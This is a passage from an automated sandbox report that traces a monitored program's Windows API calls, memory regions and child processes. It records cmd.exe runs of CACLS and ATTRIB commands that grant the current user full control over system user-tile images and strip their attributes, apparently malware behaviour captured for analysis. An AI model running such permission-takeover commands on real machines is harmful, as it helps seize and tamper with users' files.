lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessInformation=0x20f288*(hProcess=0x4c, hThread=0x50, dwProcessId=0xaa8, dwThreadId=0xa98)) returned 1 [0189.701] CloseHandle (hObject=0x50) returned 1 [0189.701] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.701] GetEnvironmentStringsW () returned 0x3e2410* [0189.701] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.701] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.784] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f17c | out: lpExitCode=0x20f17c*=0x0) returned 1 [0189.784] CloseHandle (hObject=0x4c) returned 1 [0189.784] _vsnwprintf (in: _Buffer=0x20f2c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f188 | out: _Buffer="00000000") returned 8 [0189.784] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.784] GetEnvironmentStringsW () returned 0x3e2410* [0189.784] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.784] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.784] GetEnvironmentStringsW () returned 0x3e2410* [0189.784] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.784] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e0 | out: lpAttributeList=0x20f1e0) [0189.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.784] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.785] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.785] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.785] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.785] SetConsoleInputExeNameW () returned 0x1 [0189.785] GetConsoleOutputCP () returned 0x1b5 [0189.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.785] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.785] exit (_Code=0) Process: id = "416" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "415" os_parent_pid = "0x5dc" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27701 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27702 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27703 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27704 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27705 start_va = 0x2d0000 end_va = 0x2d8fff entry_point = 0x2d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27706 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27707 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27708 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27709 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27710 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27711 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27712 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27713 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27714 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27715 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 27716 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27717 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27718 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27719 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27720 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27721 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27722 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 591 os_tid = 0xfcc Thread: id = 592 os_tid = 0x7c4 Process: id = "417" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "415" os_parent_pid = "0x5dc" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27723 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27724 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27725 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27726 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27727 start_va = 0xb60000 end_va = 0xb66fff entry_point = 0xb60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27728 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27729 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27730 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27731 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27732 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27733 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27734 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27735 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27736 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 27737 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 27738 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27739 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27740 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27741 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27742 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27743 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27744 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27745 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27746 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27747 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27748 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27749 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27750 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 27751 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27752 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 593 os_tid = 0xa98 Process: id = "418" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27753 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27754 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27755 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27756 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27757 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27758 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27759 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27760 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27761 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 27762 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27763 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27764 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27765 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27766 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 27767 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 27768 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27769 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27770 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27771 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27772 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27773 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27774 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27775 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27776 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27777 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 27778 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27779 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27780 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27781 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27782 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27783 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27784 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 27785 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 27786 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 27787 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 594 os_tid = 0x550 [0190.021] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efbb4 | out: lpSystemTimeAsFileTime=0x2efbb4*(dwLowDateTime=0xa62abb40, dwHighDateTime=0x1d440a9)) [0190.021] GetCurrentProcessId () returned 0x878 [0190.021] GetCurrentThreadId () returned 0x550 [0190.021] GetTickCount () returned 0x3623b [0190.021] QueryPerformanceCounter (in: lpPerformanceCount=0x2efbac | out: lpPerformanceCount=0x2efbac*=24681029726) returned 1 [0190.022] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0190.022] __set_app_type (_Type=0x1) [0190.022] __p__fmode () returned 0x76b331f4 [0190.022] __p__commode () returned 0x76b331fc [0190.022] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0190.022] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0190.022] GetCurrentThreadId () returned 0x550 [0190.022] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x550) returned 0x38 [0190.022] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.022] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0190.022] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.022] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0190.022] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efb44 | out: phkResult=0x2efb44*=0x0) returned 0x2 [0190.022] VirtualQuery (in: lpAddress=0x2efb7b, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0190.023] GetConsoleOutputCP () returned 0x1b5 [0190.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.023] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0190.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.023] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0190.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.023] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.023] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.023] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.023] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.023] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.024] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0190.024] GetEnvironmentStringsW () returned 0x470308* [0190.024] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.024] GetEnvironmentStringsW () returned 0x470308* [0190.024] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.024] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeab4 | out: phkResult=0x2eeab4*=0x40) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0xb8, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegCloseKey (hKey=0x40) returned 0x0 [0190.024] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeab4 | out: phkResult=0x2eeab4*=0x40) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, 